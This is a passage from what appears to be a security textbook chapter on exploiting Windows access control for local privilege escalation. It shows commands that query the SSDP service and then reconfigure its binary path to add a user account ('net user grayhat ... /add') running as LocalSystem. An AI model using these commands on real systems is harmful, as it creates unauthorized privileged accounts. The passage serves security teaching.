C:\tools>sc qc ssdpsrv
[SC] GetServiceConfig SUCCESS
Chapter 16: Exploiting Windows Access Control Model for Local Elevation of Privilege
423
PART IV
SERVICE_NAME: ssdpsrv
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : D:\SAFE_NT\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SSDP Discovery Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
Next use the sc config command to change the BINARY_PATH_NAME and
SERVICE_START_NAME to our chosen values. If this service were running as
LocalSystem already, we would not need to change the SERVICE_START_NAME.
Because it is running as LocalService, we??™ll change it to LocalSystem. Anytime you specify
a new account to run a service, you also need to supply the account??™s password. The
LocalSystem account does not have a password because you can??™t authenticate as
LocalSystem directly but you still need to specify a (blank) password to sc.exe.
C:\tools>sc config ssdpsrv binPath= "net user grayhat h@X0r11one1 /add"
[SC] ChangeServiceConfig SUCCESS
C:\tools>sc config ssdpsrv obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS
Now let??™s look at our new service configuration.
Pages:
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749